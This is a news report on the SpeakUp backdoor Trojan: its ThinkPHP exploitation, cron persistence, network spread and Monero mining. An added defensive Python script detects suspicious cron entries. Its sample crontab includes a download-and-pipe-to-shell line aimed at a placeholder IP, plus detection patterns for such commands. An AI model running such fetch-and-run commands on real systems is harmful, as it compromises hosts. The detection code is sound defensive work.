The IT security researchers at Check Point have identified new malware called SpeakUp that targets Linux and macOS. The new findings prove that there has been a surge in malware attacks against Linux and Apple devices.
SpeakUp is a new backdoor Trojan that cybercriminals are distributing through a malicious new campaign designed to target servers running six different Linux versions as well as macOS systems. The malware exploits multiple previously identified security flaws and effectively evades antivirus programs.
Check Point researchers noted that the hackers are exploiting a remote code execution flaw in ThinkPHP (CVE-2018-20062) to infect Linux and macOS servers. Hackers often prefer backdoor Trojans because this kind of malware gives them easy access to compromised devices and lets them control the infected devices by establishing a connection with a C&C server. Such malware usually helps attackers run campaigns aimed at gaining full control of the machine.
While the exact identity of the threat actor behind this new attack is still unconfirmed, Check Point researchers were able to correlate SpeakUp’s author with a malware developer operating under the name Zettabit. Although SpeakUp is implemented differently, it has a lot in common with Zettabit’s craftsmanship, the researchers said in their blog post.
According to the researchers, SpeakUp exploits ThinkPHP, a framework that almost 90% of the leading 1M domains in America use. Furthermore, it can infect Mac machines without being detected, which is a phenomenal capability. At the moment, SpeakUp is mainly targeting devices in East Asia and Latin America, and AWS-hosted devices are its prime victims. Approximately 70,000 servers across the globe are targeted in this campaign.
Check Point researchers, who identified the campaign around three weeks ago, assessed that exploiting the ThinkPHP vulnerability is only the initial attack vector that lets the Trojan infect the device. Afterwards, the Trojan modifies the local cron utility to obtain boot persistence, executes files downloaded from a remote C&C server, runs shell commands, and can uninstall or upgrade itself.
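The cron persistence and download-and-execute behaviour described above is something a defender can check for on a Linux host. The following script is an added example, not code from the article or from Check Point; it flags crontab entries that fetch content from a remote host, pipe it into a shell, run binaries from world-writable directories, or are re-armed at every boot. The crontab text, the 203.0.113.10 address and the file paths are constructed sample data, not SpeakUp indicators.

```python
import re
from typing import List, Optional, Tuple

# Heuristics for download-and-execute persistence in cron. Each pattern is
# paired with the reason reported when it matches the command part of a line.
PATTERNS: List[Tuple[str, str]] = [
    (r"\b(curl|wget)\b.*https?://", "fetches content from a remote host"),
    (r"\|\s*(ba)?sh\b", "pipes downloaded content into a shell"),
    (r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+", "runs a binary from a world-writable directory"),
    (r"base64\s+(-d|--decode)", "decodes an embedded base64 payload"),
]
# Schedules such as "* * * * *" or "*/10 * * * *" (a beaconing-style cadence).
MINUTE_CADENCE = re.compile(r"\*(/\d+)?( \*){4}")


def parse_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a user crontab line, or None for
    blank lines, comments and variable assignments such as SHELL=/bin/sh."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^\w+=", s):
        return None
    if s.startswith("@"):                      # @reboot, @daily, ...
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = s.split(None, 5)                   # five time fields + command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def suspicious_cron_entries(crontab_text: str) -> List[Tuple[str, List[str]]]:
    """Return (original line, reasons) for every entry matching a heuristic."""
    findings = []
    for line in crontab_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = [why for pat, why in PATTERNS if re.search(pat, command)]
        if reasons and schedule == "@reboot":
            reasons.append("re-armed at every boot (@reboot)")
        elif reasons and MINUTE_CADENCE.fullmatch(schedule):
            reasons.append("runs at minute-level cadence")
        if reasons:
            findings.append((line.strip(), reasons))
    return findings


# Constructed sample crontab for this example (not a real SpeakUp artifact).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
0 2 * * * /usr/bin/apt-get update -qq
*/10 * * * * curl -fsSL http://203.0.113.10/update.sh | sh
@reboot /tmp/.x/run >/dev/null 2>&1
"""

if __name__ == "__main__":
    for entry, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(entry, "->", "; ".join(reasons))
```

On a live host, feed it the output of `crontab -l` for each user or the contents of the files under /var/spool/cron and /etc/cron.d (the latter carry an extra user field after the schedule, which the parser above treats as part of the command).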
Moreover, SpeakUp has a built-in Python script that lets the malware spread across the local network. The Python script scans local networks for open ports and brute-forces the systems it finds in the nearest vicinity, using a list of pre-defined login credentials.
It also uses seven different exploits, including remote command execution exploits and one for the Oracle WebLogic Server component of Oracle Fusion Middleware, to take control of unpatched systems. After infecting new machines, the malware deploys itself on them.
Apparently, the attackers are using SpeakUp to deploy Monero cryptocurrency miners on infected devices, and so far the group has made 107 Monero coins (around $4,500). Although the attackers are currently exploiting the Chinese PHP framework, they could switch to other exploits to widen the scope of their backdoor and the range of targets. However, they have not yet targeted anything other than the ThinkPHP framework.